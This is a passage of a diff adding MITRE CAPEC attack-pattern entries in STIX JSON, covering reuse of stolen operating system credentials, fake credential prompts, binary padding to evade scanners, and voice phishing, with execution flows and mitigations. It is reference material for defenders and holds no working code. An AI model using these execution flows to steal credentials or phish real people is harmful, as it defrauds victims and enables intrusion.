+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.", + "id": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f1be939-d853-4d8a-95f3-0b617e01e652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a90ffcb8-0f80-4e85-8b26-10496f6bb52a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--785c37de-0ec5-4060-874b-ee39ba235750", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of Kerberos service account credentials to log into domain systems.", + "id": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--d34114ce-f6a3-4ab9-ba44-4d82771bf60f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow Kerberos service accounts to be a local administrator on more than one system.", + "id": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4ad929d-f0f1-40d2-b370-48856e8046d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable at least AES Kerberos encryption for tickets.", + "id": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8864ef8-634a-4587-9b9f-7dffc85bb827", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6950a75-d731-468c-a735-bd8659dd2c6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. 
This applies to any Operating System.", + "external_references": [ + { + "external_id": "CAPEC-653", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/653.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.", + "external_id": "REF-576", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/" + } + ], + "id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Operating System Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + 
"x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. 
[REF-576]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known operating system credentials: The adversary must obtain known operating system credentials in order to access the target system, application, or service within the domain.

  2. Techniques
    An adversary purchases breached operating system username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal operating system credentials as they are transmitted.
    An adversary gains access to a system/files and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Experiment

  1. Attempt authentication: Try each operating system credential against various systems, applications, and services within the domain until the target grants access.

  2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the network

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the network. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within system files or application configuration.

", + "x_capec_extended_description": "\n This attack can be extremely harmful when the operating system credentials used are for a root or admin user. Once an adversary gains access using credentials with elevated privileges, they are free to alter important system files which can effect other users who may use the system or other users on the system's network.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials for the targeted domain.", + "A custom script that leverages a credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the network.", + "id": "course-of-action--32cdaaf1-c6c9-4f68-b16f-430164c55bc6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-653-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--afbf45fe-6bad-41af-a683-b7cf50fbf513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32cdaaf1-c6c9-4f68-b16f-430164c55bc6", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--30fc8e66-ac77-4700-963e-64a29973924f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ 
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a406676c-8452-46d2-a72c-11463c53b3cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32a275d9-4766-40b2-ae6b-7307d384bf7b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fb187-a070-476a-914d-5c9f061558d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c81c0b14-89ac-4328-87fc-e5471e7edfc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37212961-3d05-427a-ada9-72ac4ca5adca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.", + "external_references": [ + { + "external_id": "CAPEC-654", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + }, + { + "description": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "external_id": "T1548.004", + "source_name": "ATTACK", + "url": 
"https://attack.mitre.org/wiki/Technique/T1548/004" + } + ], + "id": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Prompt Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing their credentials.

  2. Techniques
    Determine what tasks prompt a user for their credentials.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
", + "x_capec_extended_description": "\n The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt.\n A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate credential prompt." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--941eef6d-7520-4cb3-97db-3e53b6e58b9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "target_ref": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.\n In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.\n ", + "external_references": [ + { + "external_id": "CAPEC-655", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/655.html" + }, + { + "description": "Obfuscated Files or Information:Binary padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Avoid Security Tool Identification by Adding Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716" + ], + "x_capec_consequences": { + "Accountability": [ + "Hide Activities", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify 
Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn't typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \"cold call\" or by the victim if calling an illegitimate telephone number.", + "external_references": [ + { + "external_id": "CAPEC-656", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/656.html" + }, + { + "description": "Jovi Umawing, Something else is phishy: How to detect phishing attempts on mobile phones , 2018--12---10, Malwarebytes", + "external_id": "REF-592", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/" + }, + { + "description": "Jennifer van der Kleut, What is vishing? 
Tips for spotting and avoiding voice scams, NortonLifeLock Inc.", + "external_id": "REF-594", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + }, + { + "description": "What Is Vishing?, AO Kaspersky Lab", + "external_id": "REF-595", + "source_name": "reference_from_CAPEC", + "url": "https://www.kaspersky.com/resource-center/definitions/vishing" + } + ], + "id": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Voice Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Vishing", + "VoIP Phishing" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.", + "An adversary calls the target and claims to work for their bank. 
The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim's account to an account controlled by the adversary." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate organization's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Explore legitimate website and create duplicate: An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization's website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to provide sensitive information to the adversary.: An adversary \"cold calls\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Call the user a from a spoofed legitimate-looking telephone number.
  3. Use stolen information: Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim's bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.

  4. Techniques
    Login to the legitimate site using another the victim's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.", + "An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.", + "If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Legitimate-looking telephone number(s) to initiate calls with victims" + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. 
